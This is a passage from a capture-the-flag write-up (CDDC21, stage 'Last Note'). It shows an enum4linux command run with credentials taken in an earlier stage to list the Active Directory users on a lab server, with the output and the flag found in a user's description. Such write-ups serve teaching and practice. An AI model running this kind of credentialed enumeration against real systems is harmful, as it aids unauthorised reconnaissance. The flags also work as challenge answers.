Flag: CDDC21{lsa$$_DUMP_password}

4. Last Note

We just need to find the final piece of information. Use the credentials you have found so far and list all the GDC users configured on the server.

My teammate TheMythologist solved this one. The solution uses John’s credentials obtained from stage 2. Old Memories. Using enum4linux to enumerate and list all users’ information, we find the flag in the description of henry.s’s account on line 12.

1
enum4linux -u "John" -p "#johnIStheBEST!" -a 54.255.213.169
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 =============================== 
|    Users on 54.255.213.169    |
 =============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0x10ab RID: 0x461 acb: 0x00000010 Account: adrian.c	Name: Collins, Adrian	Desc: Programer at GDC
index: 0x10ae RID: 0x464 acb: 0x00000010 Account: alexander.p	Name: Perry, Alexander	Desc: Help Desk
index: 0x10a9 RID: 0x45f acb: 0x00000010 Account: andy.g	Name: Goode, Andrew	Desc: Algorithms at GDC
index: 0x10a8 RID: 0x45e acb: 0x00000010 Account: ci_admin	Name: Admin, CI	Desc: Continuous Integration Admin
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000214 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x10a2 RID: 0x458 acb: 0x00000010 Account: henry.s	Name: Stewart, Henry	Desc: CDDC21{We!!_D0NE}
index: 0x10a3 RID: 0x459 acb: 0x00000010 Account: jacob.c	Name: Coleman, Jacob	Desc: Customer Success Manager
index: 0x10b3 RID: 0x468 acb: 0x00000210 Account: john	Name: john	Desc: (null)
index: 0x10ac RID: 0x462 acb: 0x00000010 Account: john.m	Name: Miller, John	Desc: Programer at GDC
index: 0x10aa RID: 0x460 acb: 0x00000010 Account: justin.t	Name: Tuck, Justin	Desc: Programer at GDC
index: 0xff5 RID: 0x1f6 acb: 0x00000011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x10a5 RID: 0x45b acb: 0x00000010 Account: marcus.w	Name: Wright, Marcus	Desc: Researcher at GDC
index: 0xfbf RID: 0x3f0 acb: 0x00000210 Account: root	Name: root	Desc: (null)
index: 0x10ad RID: 0x463 acb: 0x00000010 Account: ryan.b	Name: Butler, Ryan	Desc: Help Desk Manager
index: 0x10a4 RID: 0x45a acb: 0x00000010 Account: serena.k	Name: Kagan, Serena	Desc: Researcher at GDC
index: 0x10af RID: 0x465 acb: 0x00000010 Account: svc_admin	Name: , SVC	Desc: Service admin account
index: 0x10a6 RID: 0x45c acb: 0x00000010 Account: thomas.p	Name: Parnell, Thomas	Desc: Researcher at GDC
index: 0x10a7 RID: 0x45d acb: 0x00000010 Account: vick.c	Name: Chamberlain, Vick	Desc: Researcher at GDC

Flag: CDDC21{We!!_D0NE}


Thanks for reading as always :)

Share on

rainbowpigeon
WRITTEN BY
rainbowpigeon
OSCP | OSED | Burp Suite Certified Practitioner